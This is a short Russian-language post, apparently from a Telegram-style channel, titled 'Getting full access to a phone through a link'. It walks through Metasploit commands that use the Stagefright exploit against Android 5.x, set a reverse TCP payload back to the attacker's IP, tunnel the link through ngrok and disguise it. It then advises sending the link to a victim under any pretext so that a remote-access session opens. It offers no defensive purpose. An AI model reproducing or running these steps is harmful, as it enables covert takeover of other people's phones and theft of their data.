2021-07-25 03:00:08
Получаем полный доступ к телефону через ссылку
Привет, друзья. Сегодня мы будем использовать утилиту под названием Metasploit. С ее помощью можно получить полный удалённый доступ к смартфону на Android.
Эксплуатировать будем уязвимость - Stagefright. Она актуальна на относительно старых версиях Android (5.0 - 5.1.1).
Инструкция по установке:
Установка Metasploit на Termux — ТЫК
Установка Metasploit на Linux — ТЫК
Если у вас Kali Linux, то Metasploit уже стоит из коробки.
Если Stagefright нет в Metasploit, то скачиваем его — ТЫК и закидываем в папку с эксплоитами.
Использование:
msfconsole — открытие консоли
use exploit/android/browser/stagefright_mp4_tx3g_64bit — подключение эксплоита
set SRVHOST вашIP
set URIPATH /
set PAYLOAD linux/armle/mettle/reverse_tcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита
Сгенерируется ссылка, которую надо завернуть в ngrok, а потом неплохо было бы замаскировать — ТЫК.
После этого нужно отправить готовую ссылку под любым предлогом, а при переходе по ссылке откроется новая сессия для удалённого доступа.
31 views𝙍𝙊𝘿., 00:00